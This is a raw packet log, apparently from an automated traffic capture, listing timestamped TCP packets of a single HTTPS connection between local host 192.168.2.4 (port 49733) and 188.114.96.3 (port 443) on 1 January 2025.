Jan 1, 2025 17:10:08.752002001 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.752024889 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.752032042 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.752065897 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.796700954 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.848347902 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.848370075 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.848424911 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.848443985 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.848458052 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.848465919 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.848503113 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.848507881 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.848516941 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.848562002 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.848624945 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.848638058 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.848697901 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.848706007 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.848742962 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.848885059 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.848901987 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.848956108 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.848962069 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.849001884 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.849136114 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.849150896 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.849191904 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.849199057 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.849236012 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.849297047 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.849314928 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.849370003 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.849376917 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.849412918 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.849631071 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.849644899 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.849688053 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.849694014 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.849711895 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.849729061 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.849740982 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.849747896 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.849761963 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.849783897 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.849817991 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.938848019 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.938863993 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.938962936 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.938966990 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.938985109 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.939016104 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.939070940 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.939160109 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.939177036 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.939229965 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.939239025 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.939280033 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.939388990 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.939407110 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.939449072 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.939455986 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.939503908 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.939620018 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.939632893 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.939680099 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.939687967 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.939713955 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.939905882 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.939955950 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.939965963 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.939970970 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.940013885 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.940217018 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.940232038 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.940265894 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.940304041 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.940306902 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.940319061 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.940360069 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.940362930 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.940392971 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.940397024 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:08.940423965 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:08.940435886 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:09.044094086 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.044109106 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.044166088 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:09.044178009 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.044188023 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.044188976 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:09.044224024 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.044229031 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:09.044250965 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.044254065 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:09.044261932 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.044285059 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:09.044297934 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.044315100 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:09.044322014 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.044348955 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.044353962 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:09.044370890 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:09.044377089 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.044404030 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.044413090 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:09.044418097 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.044436932 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:09.044442892 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.044470072 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:09.044492960 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:09.044617891 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.044631958 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.044672012 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:09.044677973 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.044706106 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:09.044719934 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:09.044852972 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.044867039 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.044914007 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:09.044922113 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.044939041 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:09.044962883 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:09.045172930 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.045193911 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.045245886 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:09.045257092 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.045267105 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:09.045296907 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:09.134131908 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.134150982 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.134233952 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:09.134252071 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.134295940 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:09.134341002 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.134356022 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.134392023 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:09.134397984 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.134423971 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:09.134443998 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:09.134582996 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.134604931 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.134665012 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:09.134670973 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.134713888 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:09.134814978 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.134830952 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.134880066 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:09.134886980 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.134927988 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:09.135010958 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.135025978 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.135066032 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:09.135071993 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.135102034 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:09.135114908 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:09.135231972 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.135247946 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.135287046 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:09.135291100 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.135330915 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:09.135330915 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:09.135498047 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.135513067 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.135554075 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:09.135560989 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.135586023 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:09.135601044 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:09.135740042 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.135756969 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.135802031 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:09.135809898 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.135852098 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:09.262233019 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.262249947 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.262326002 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:09.262340069 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.262383938 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:09.262423038 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.262438059 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.262486935 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:09.262495041 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.262535095 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:09.262542963 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.262558937 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.262604952 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:09.262618065 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.262660027 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:09.262830973 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.262845039 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.262902975 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:09.262908936 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.262948990 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:09.263030052 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.263045073 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.263101101 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:09.263107061 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.263149023 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:09.263253927 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.263269901 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.263331890 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:09.263338089 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.263381958 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:09.263482094 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.263500929 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.263639927 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:09.263647079 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.263700962 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.263719082 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.263730049 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:09.263736010 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.263778925 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:09.263808012 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:09.352749109 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.352763891 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.352855921 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.352901936 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.352945089 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:09.352957964 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.352996111 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:09.353082895 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.353096008 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.353157997 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:09.353167057 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.353425980 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.353460073 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.353492022 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:09.353497982 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.353514910 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:09.353643894 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.353657007 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.353714943 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:09.353723049 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.353918076 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.353934050 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.353974104 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:09.353981018 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.353991985 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:09.355190039 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.355201960 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.355246067 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:09.355257034 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.356295109 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.356312990 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.356348991 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:09.356358051 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.356373072 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:09.406052113 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:09.443777084 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.443793058 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.443861961 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.443872929 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:09.443885088 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.443923950 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:09.443953037 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:09.443990946 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.444008112 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.444048882 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:09.444060087 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.444077015 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:09.444119930 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.444140911 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.444169998 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:09.444179058 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.444205046 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:09.444303989 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.444317102 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.444371939 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:09.444380045 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.444461107 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.444484949 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.444518089 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:09.444525957 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.444545984 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:09.445715904 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.445729971 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.445787907 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:09.445796967 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.449136972 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.449157000 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.449194908 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:09.449203968 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.449222088 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:09.499794006 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:09.534024954 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.534053087 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.534117937 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:09.534127951 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.534169912 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:09.534239054 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.534252882 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.534310102 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:09.534317970 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.534359932 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:09.534427881 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.534441948 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.534512043 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:09.534518003 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.534554005 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:09.534595013 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.534607887 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.534657955 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:09.534663916 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.534701109 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:09.534781933 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.534797907 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.534845114 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:09.534851074 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.534885883 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:09.534982920 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.534996986 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.535048962 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:09.535056114 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.535089970 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:09.536206007 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.536221027 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.536263943 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:09.536272049 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.536313057 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:09.537300110 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.537313938 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.537365913 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:09.537373066 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.537384033 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:09.537753105 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:09.629087925 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.629106045 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.629175901 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:09.629184008 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.629205942 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.629230976 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:09.629237890 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.629272938 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:09.629292965 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:09.629368067 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.629380941 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.629415989 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:09.629421949 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:09.629456997 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:09.629468918 CET	49733	443	192.168.2.4	188.114.96.3
